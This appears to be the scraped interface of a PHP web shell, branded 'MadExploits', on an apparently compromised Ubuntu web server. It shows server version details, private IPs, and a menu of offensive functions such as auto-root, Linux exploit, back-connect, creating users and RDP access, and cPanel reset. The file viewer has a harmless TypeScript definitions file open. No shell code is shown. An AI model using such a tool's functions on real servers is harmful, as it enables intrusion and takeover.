Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@types /
normalize-package-data /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.77
KB
-rw-r--r--
package.json
843
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Type definitions for normalize-package-data 2.4 // Project: https://github.com/npm/normalize-package-data#readme // Definitions by: Jeff Dickey <https://github.com/jdxcode> // Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped export = normalize; declare function normalize(data: normalize.Input, warn?: normalize.WarnFn, strict?: boolean): void; declare function normalize(data: normalize.Input, strict?: boolean): void; declare namespace normalize { type WarnFn = (msg: string) => void; interface Input {[k: string]: any; } interface Person { name?: string | undefined; email?: string | undefined; url?: string | undefined; } interface Package { [k: string]: any; name: string; version: string; files?: string[] | undefined; bin?: {[k: string]: string } | undefined; man?: string[] | undefined; keywords?: string[] | undefined; author?: Person | undefined; maintainers?: Person[] | undefined; contributors?: Person[] | undefined; bundleDependencies?: {[name: string]: string; } | undefined; dependencies?: {[name: string]: string; } | undefined; devDependencies?: {[name: string]: string; } | undefined; optionalDependencies?: {[name: string]: string; } | undefined; description?: string | undefined; engines?: {[type: string]: string } | undefined; license?: string | undefined; repository?: { type: string, url: string } | undefined; bugs?: { url: string, email?: string | undefined } | { url?: string | undefined, email: string } | undefined; homepage?: string | undefined; scripts?: {[k: string]: string} | undefined; readme: string; _id: string; } }
Close